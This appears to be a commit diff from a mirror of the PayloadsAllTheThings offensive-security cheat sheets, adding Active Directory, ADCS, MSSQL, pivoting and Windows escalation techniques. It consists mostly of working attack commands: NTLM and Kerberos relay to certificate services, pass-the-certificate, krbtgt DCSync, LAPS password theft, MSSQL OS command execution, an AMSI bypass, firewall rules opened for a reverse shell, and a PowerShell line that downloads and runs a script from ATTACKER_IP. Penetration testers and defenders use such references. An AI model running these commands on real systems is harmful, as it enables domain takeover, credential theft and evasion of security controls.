mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
LAPS Access + Pass the Cert + Writeable folder
This commit is contained in:
parent
51aeb90623
commit
3066615cde
@ -82,6 +82,7 @@
|
||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||
- [Pass-The-Certificate](#pass-the-certificate)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||
- [GenericAll](#genericall)
|
||||
@ -230,13 +231,13 @@ Use the correct collector
|
||||
# run the collector on the machine using SharpHound.exe
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
|
||||
.\SharpHound.exe -c all -d active.htb -SearchForest
|
||||
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||
.\SharpHound.exe -c all,GPOLocalGroup
|
||||
.\SharpHound.exe -c all -d active.htb --searchforest
|
||||
.\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
|
||||
.\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
|
||||
|
||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
|
||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
|
||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
||||
.\SharpHound.exe -c all,GPOLocalGroup --searchforest
|
||||
|
||||
# or run the collector on the machine using Powershell
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||
@ -1466,7 +1467,15 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
|
||||
```bash
|
||||
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
|
||||
```
|
||||
|
||||
|
||||
#### Grant LAPS Access
|
||||
The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
|
||||
|
||||
```ps1
|
||||
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||||
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
|
||||
```
|
||||
|
||||
|
||||
### Reading GMSA Password
|
||||
|
||||
@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
|
||||
|
||||
### Active Directory Certificate Services
|
||||
|
||||
* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||
* Find ADCS Server
|
||||
* `crackmapexec ldap domain.lab -u username -p password -M adcs`
|
||||
* `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
|
||||
* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
|
||||
|
||||
#### ESC1 - Misconfigured Certificate Templates
|
||||
@ -2247,8 +2258,10 @@ Exploitation:
|
||||
```ps1
|
||||
Certify.exe find /vulnerable
|
||||
Certify.exe find /vulnerable /currentuser
|
||||
or
|
||||
# or
|
||||
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||
# or
|
||||
certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
|
||||
```
|
||||
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||
```ps1
|
||||
@ -2394,64 +2407,75 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
|
||||
|
||||
Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
|
||||
|
||||
* Version 1: NTLM Relay + Rubeus + PetitPotam
|
||||
```powershell
|
||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
||||
# For a member server or workstation, the template would be "Computer".
|
||||
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
|
||||
* **Version 1**: NTLM Relay + Rubeus + PetitPotam
|
||||
```powershell
|
||||
impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
|
||||
# For a member server or workstation, the template would be "Computer".
|
||||
# Other templates: workstation, DomainController, Machine, KerberosAuthentication
|
||||
|
||||
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
||||
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
||||
git clone https://github.com/topotam/PetitPotam
|
||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
|
||||
python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
|
||||
python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
|
||||
# Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam
|
||||
# You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN
|
||||
git clone https://github.com/topotam/PetitPotam
|
||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
|
||||
python3 dementor.py <listener> <target> -u <username> -p <password> -d <domain>
|
||||
python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local
|
||||
|
||||
# Use the certificate with rubeus to request a TGT
|
||||
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
|
||||
Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
|
||||
# Use the certificate with rubeus to request a TGT
|
||||
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
|
||||
Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt
|
||||
|
||||
# Now you can use the TGT to perform a DCSync
|
||||
mimikatz> lsadump::dcsync /user:krbtgt
|
||||
```
|
||||
# Now you can use the TGT to perform a DCSync
|
||||
mimikatz> lsadump::dcsync /user:krbtgt
|
||||
```
|
||||
|
||||
* Version 2: NTLM Relay + Mimikatz + Kekeo
|
||||
```powershell
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
* **Version 2**: NTLM Relay + Mimikatz + Kekeo
|
||||
```powershell
|
||||
impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
|
||||
# Mimikatz
|
||||
mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
|
||||
# Mimikatz
|
||||
mimikatz> misc::efs /server:dc.lab.local /connect:<IP> /noauth
|
||||
|
||||
# Kekeo
|
||||
kekeo> base64 /input:on
|
||||
kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
|
||||
# Kekeo
|
||||
kekeo> base64 /input:on
|
||||
kekeo> tgt::ask /pfx:<BASE64-CERT-FROM-NTLMRELAY> /user:dc$ /domain:lab.local /ptt
|
||||
|
||||
# Mimikatz
|
||||
mimikatz> lsadump::dcsync /user:krbtgt
|
||||
```
|
||||
* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
||||
```powershell
|
||||
https://github.com/bats3c/ADCSPwn
|
||||
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
||||
adcspwn.exe --adcs cs.pwnlab.local
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
|
||||
# Mimikatz
|
||||
mimikatz> lsadump::dcsync /user:krbtgt
|
||||
```
|
||||
|
||||
# ADCSPwn arguments
|
||||
adcs - This is the address of the AD CS server which authentication will be relayed to.
|
||||
secure - Use HTTPS with the certificate service.
|
||||
port - The port ADCSPwn will listen on.
|
||||
remote - Remote machine to trigger authentication from.
|
||||
username - Username for non-domain context.
|
||||
password - Password for non-domain context.
|
||||
dc - Domain controller to query for Certificate Templates (LDAP).
|
||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||
output - Output path to store base64 generated crt.
|
||||
```
|
||||
* Version 4: Certipy ESC8
|
||||
* **Version 3**: Kerberos Relay
|
||||
```ps1
|
||||
# Setup the relay
|
||||
sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
|
||||
|
||||
# Run mitm6
|
||||
sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
|
||||
```
|
||||
|
||||
* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
|
||||
```powershell
|
||||
https://github.com/bats3c/ADCSPwn
|
||||
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
||||
adcspwn.exe --adcs cs.pwnlab.local
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
|
||||
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
|
||||
|
||||
# ADCSPwn arguments
|
||||
adcs - This is the address of the AD CS server which authentication will be relayed to.
|
||||
secure - Use HTTPS with the certificate service.
|
||||
port - The port ADCSPwn will listen on.
|
||||
remote - Remote machine to trigger authentication from.
|
||||
username - Username for non-domain context.
|
||||
password - Password for non-domain context.
|
||||
dc - Domain controller to query for Certificate Templates (LDAP).
|
||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||
output - Output path to store base64 generated crt.
|
||||
```
|
||||
|
||||
* **Version 5**: Certipy ESC8
|
||||
```ps1
|
||||
certipy relay -ca 172.16.19.100
|
||||
```
|
||||
@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
```
|
||||
|
||||
|
||||
#### Pass-The-Certificate
|
||||
|
||||
* Windows
|
||||
```ps1
|
||||
# Information about a cert file
|
||||
certutil -v -dump admin.pfx
|
||||
|
||||
# From a Base64 PFX
|
||||
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
|
||||
```
|
||||
* Linux
|
||||
```ps1
|
||||
# Base64-encoded PFX certificate (string) (password can be set)
|
||||
gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
|
||||
# PEM certificate (file) + PEM private key (file)
|
||||
gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
|
||||
# PFX certificate (file) + password (string, optionnal)
|
||||
gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
|
||||
```
|
||||
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
|
||||
@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
|
||||
([adsisearcher]"(AdminCount=1)").findall()
|
||||
```
|
||||
|
||||
|
||||
#### AdminSDHolder Abuse
|
||||
|
||||
> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
|
||||
|
@ -3,6 +3,7 @@
|
||||
## Summary
|
||||
|
||||
* [Azure Recon Tools](#azure-recon-tools)
|
||||
* [Terminology](#terminology)
|
||||
* [Enumeration](#enumeration)
|
||||
* [Enumerate valid emails](#enumerate-valid-emails)
|
||||
* [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
|
||||
@ -179,7 +180,17 @@
|
||||
# Administrator
|
||||
$ Create-Backdoor, Execute-Backdoor
|
||||
```
|
||||
|
||||
## Terminology
|
||||
|
||||
> Basic Azure AD terminologies
|
||||
|
||||
* **Tenant**: An instance of Azure AD and represents a single organization.
|
||||
* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
|
||||
* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
|
||||
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
|
||||
|
||||
|
||||
## Enumeration
|
||||
|
||||
### Enumerate valid emails
|
||||
@ -1115,4 +1126,5 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
|
||||
* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
|
||||
* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
|
||||
* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
|
||||
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
||||
* [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
|
||||
* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)
|
@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
|
||||
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
||||
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
||||
* [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
|
||||
* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)
|
@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
|
||||
|
||||
```ps1
|
||||
Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
|
||||
select * from master..sysservers
|
||||
```
|
||||
|
||||
### Crawl Links for a Specific Instance
|
||||
|
||||
```ps1
|
||||
Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
|
||||
select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
|
||||
```
|
||||
|
||||
### Query Version of Linked Database
|
||||
@ -286,12 +288,21 @@ Prerequisites:
|
||||
* CREATE ASSEMBLY permission (or)
|
||||
* ALTER ASSEMBLY permission (or)
|
||||
|
||||
The execution takes place with privileges of the **service account**.
|
||||
|
||||
### Execute commands using CLR assembly
|
||||
|
||||
```ps1
|
||||
# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
|
||||
Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
|
||||
|
||||
# Execute command using CLR assembly
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
|
||||
or
|
||||
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
|
||||
|
||||
# List all the stored procedures added using CLR
|
||||
Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
|
||||
```
|
||||
|
||||
### Manually creating a CLR DLL and importing it
|
||||
@ -385,6 +396,7 @@ GO
|
||||
## OLE Automation
|
||||
|
||||
* :warning: Disabled by default
|
||||
* The execution takes place with privileges of the **service account**.
|
||||
|
||||
### Execute commands using OLE automation procedures
|
||||
|
||||
@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
|
||||
|
||||
## Agent Jobs
|
||||
|
||||
* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
|
||||
* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
|
||||
|
||||
### Execute commands through SQL Agent Job service
|
||||
|
||||
```ps1
|
||||
@ -461,12 +476,21 @@ RECONFIGURE;
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
|
||||
WITH RESULT SETS (([cmd_out] nvarchar(max)))
|
||||
```
|
||||
|
||||
## R
|
||||
|
||||
```ps1
|
||||
Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
|
||||
|
||||
EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
|
||||
WITH RESULT SETS (([cmd_out] text));
|
||||
GO
|
||||
|
||||
@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
|
||||
```
|
||||
|
||||
## Audit Checks
|
||||
@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS
|
||||
|
||||
## Find databases that have been configured as trustworthy
|
||||
|
||||
```ps1
|
||||
```sql
|
||||
Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose
|
||||
|
||||
SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
|
||||
```
|
||||
|
||||
> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.
|
||||
|
@ -30,8 +30,17 @@
|
||||
|
||||
```powershell
|
||||
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
|
||||
|
||||
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
|
||||
|
||||
# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
|
||||
netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
|
||||
netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
|
||||
# Correctly open the port on the machine
|
||||
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
|
||||
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
|
||||
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
|
||||
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
|
||||
|
||||
```
|
||||
|
||||
1. listenaddress – is a local IP address waiting for a connection.
|
||||
@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
|
||||
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
|
||||
* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
|
||||
* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
|
||||
* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)
|
@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
|
||||
### AppLocker Enumeration
|
||||
|
||||
- With the GPO
|
||||
- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
|
||||
|
||||
* List AppLocker rules
|
||||
```powershell
|
||||
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
|
||||
```
|
||||
|
||||
* Applocker Bypass
|
||||
* AppLocker Bypass
|
||||
* By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
|
||||
* https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
|
||||
@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
|
||||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
|
||||
```
|
||||
|
||||
Powershell Constrained Mode
|
||||
#### Powershell Constrained Mode
|
||||
|
||||
```powershell
|
||||
# Check if we are in a constrained mode
|
||||
$ExecutionContext.SessionState.LanguageMode
|
||||
* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
|
||||
* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
|
||||
* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
|
||||
* Other bypasses
|
||||
```powershell
|
||||
PS > &{ whoami }
|
||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||
```
|
||||
|
||||
PS > &{ whoami }
|
||||
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
|
||||
#### AMSI Bypass
|
||||
|
||||
# PowerShDLL - Powershell with no Powershell.exe via DLL’s
|
||||
# https://github.com/p3nt4/PowerShdll
|
||||
ftp> rundll32.exe C:\temp\PowerShdll.dll,main
|
||||
```
|
||||
|
||||
|
||||
|
||||
Example of AMSI Bypass.
|
||||
Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
|
||||
|
||||
```powershell
|
||||
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
|
||||
@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
|
||||
```powershell
|
||||
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
|
||||
C:\Windows\System32\spool\drivers\color
|
||||
C:\Windows\Tasks
|
||||
C:\Windows\System32\spool\printers
|
||||
C:\Windows\System32\spool\servers
|
||||
C:\Windows\tracing
|
||||
C:\Windows\Temp
|
||||
C:\Users\Public
|
||||
C:\Windows\Tasks
|
||||
C:\Windows\System32\tasks
|
||||
C:\Windows\SysWOW64\tasks
|
||||
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
|
||||
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
|
||||
C:\Windows\debug\wia
|
||||
C:\Windows\registration\crmlog
|
||||
C:\Windows\System32\com\dmp
|
||||
C:\Windows\SysWOW64\com\dmp
|
||||
C:\Windows\System32\fxstmp
|
||||
C:\Windows\SysWOW64\fxstmp
|
||||
```
|
||||
|
||||
## EoP - Looting for passwords
|
||||
|
Loading…
Reference in New Issue
Block a user